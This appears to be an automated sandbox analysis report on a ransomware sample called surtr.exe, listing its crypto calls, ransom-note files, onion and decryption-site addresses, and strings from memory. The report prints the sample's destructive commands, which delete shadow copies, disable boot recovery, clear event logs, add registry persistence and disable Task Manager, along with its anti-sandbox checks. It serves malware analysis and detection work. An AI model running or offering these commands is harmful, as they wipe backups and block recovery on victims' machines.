Source: C:\Users\user\Desktop\surtr.exe | Code function: 0_2_00007FF7F5E61070 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,GetLastError, | 0_2_00007FF7F5E61070 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_0000000140005190 CryptEncrypt,GetLastError, | 3_2_0000000140005190 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_0000000140004BC0 CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptBinaryToStringA,CryptBinaryToStringA,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,CryptExportKey,CryptExportKey,CryptBinaryToStringA,CryptBinaryToStringA,CryptDestroyKey,CryptAcquireContextW,CryptImportKey,GetLastError,GetLastError,GetLastError, | 3_2_0000000140004BC0 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_00000001400E87E0 GetFileAttributesW,GetFileAttributesW,CopyFileA,_fread_nolock,GetConsoleWindow,ShowWindow,OpenMutexW,CreateMutexW,GetCurrentProcess,SetPriorityClass,SetProcessPriorityBoost,GetModuleHandleA,GetProcAddress,GetCurrentProcess,ReadProcessMemory,GlobalMemoryStatusEx,CreateFileW,DeviceIoControl,GetCurrentThread,GetThreadContext,IsDebuggerPresent,GetModuleHandleW,GetModuleFileNameW,DeleteFileW,CopyFileW,DeleteFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,_fread_nolock,GetFileAttributesW,_fread_nolock,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,GetLastError,GetFileAttributesW,GetFileAttributesW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,GetSystemInfo,CopyFileW,ReleaseMutex,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,MessageBoxW, | 3_2_00000001400E87E0 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C008 CryptImportKey, | 3_2_000000014010C008 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C030 CryptGenKey, | 3_2_000000014010C030 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C058 CryptStringToBinaryA, | 3_2_000000014010C058 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_00000001400E91CB GetCurrentProcess,SetPriorityClass,SetProcessPriorityBoost,GetModuleHandleA,GetProcAddress,GetCurrentProcess,ReadProcessMemory,GlobalMemoryStatusEx,CreateFileW,DeviceIoControl,GetCurrentThread,GetThreadContext,IsDebuggerPresent,GetModuleHandleW,GetModuleFileNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,_fread_nolock,GetFileAttributesW,_fread_nolock,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,GetFileAttributesW,GetFileAttributesW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,GetSystemInfo,CopyFileW,ReleaseMutex,MessageBoxW,MessageBoxW,MessageBoxW,Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,MessageBoxW, | 3_2_00000001400E91CB |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.hta | |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.txt | |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\Private_DATA.surt | |
Source: C:\Windows\System32\vssadmin.exe | File opened: z: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: x: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: v: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: t: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: r: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: p: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: n: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: l: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: j: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: h: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: f: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: d: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: b: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: y: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: w: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: u: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: s: | |
Source: C:\Users\user\Desktop\surtr.exe | File opened: q: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: o: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: m: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: k: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: i: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: g: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: e: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: c: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: a: | |
Source: surtr.exe | String found in binary or memory: http://4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion |
Source: surtr.exe | String found in binary or memory: http://surtr-decrypt.top/ |
Source: surtr.exe | String found in binary or memory: http://www.surtr-decrypt.top |
Source: surtr.exe | String found in binary or memory: https://TorProject.org |
Source: surtr.exe | String found in binary or memory: https://bridges.torproject.org |
Source: surtr.exe | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize |
Source: surtr.exe | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css |
Source: surtr.exe | String found in binary or memory: https://fonts.googleapis.com/css2?family=Didact |
Source: surtr.exe | String found in binary or memory: https://tb-manual.torproject.org/about |
Source: surtr.exe | String found in binary or memory: https://www.TorProject.org |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/ae/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/de/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/fr/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/us/flat/32 |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/us/flat/32.png); |
Source: C:\Windows\System32\chcp.com | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /all /quiet | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB | |
Source: surtr.exe | Binary or memory string: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet | |
Source: surtr.exe, 00000003.00000002.563302470.0000000140000000.00000040.00000001.sdmp | Binary or memory string: Host: ","api":","cryptstatus":"","filecount":"","version":"","starttime":"","email":"","privatekey":"","keyboards":"","hostname":"GB","username":"","hardused":"" ,"OS":"","crypter":"2i74xfkhsu4zd6qv5aiifv3wznj6vq3jo6mle3zxux6vpftyuezxhmad.onion.pet2i74xfkhsu4zd6qv5aiifv3wznj6vq3jo6mle3zxux6vpftyuezxhmad.onion.ly4.2.2.4donebanUser is Banned, do not try againmkdir C:\ProgramData\ServiceC:\ProgramData\Service\config.surtrconfig.surtrwb+C:\ProgramData\Service\SurtrBackGround.jpgC:\ProgramData\Service\SurtrBackGround.jpgattrib +h +s C:\ProgramData\Service\SurtrBackGround.jpgbootcfg /raw /a /safeboot:network /id 1bcdedit /set {current} safeboot networkreg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *test /t REG_SZ /d "bcdedit /deletevalue {current} safeboot" /f" /freg ADD HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce /v *execute /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.icoattrib +h C:\ProgramData\Service\SurtrIcon.icoreg DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\ /va /freg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\UserChoice /v ProgId /t REG_SZ /d surt_auto_file /freg ADD HKEY_CLASSES_ROOT\.surt /ve /t REG_SZ /d surt_auto_file /freg ADD HKEY_CLASSES_ROOT\surt_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /fNoRunAnyWayC:\ProgramData\NoRunAnyWayWARNING. Self Protection Is Enable.offlinemodeWARNING. Bad Config.nowindowshideSurtrMUTEXecho offchcp 437IranRussiaUkraineArmeniaAzerbaijanTurkmenistanTurkeyGeorgiaKazakhstanTajikistanUzbekistanWARNING. Surtr does not run in this country, if you do it again you will be banned.WARNING. 
SandBox/Debugger Detected !!!runinsafemodeconfig.surtrC:\ProgramData\Service\config.surtr000000000000nostopservicesC:\ProgramData\Service\Service.surtnodeletebackupsC:\ProgramData\Service\BUs.surtC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quietC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled NoC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailuresnocloseprocessesnoregeditC:\ProgramData\Service\reg.surtnostartupnocryptingfor /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /Freg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr |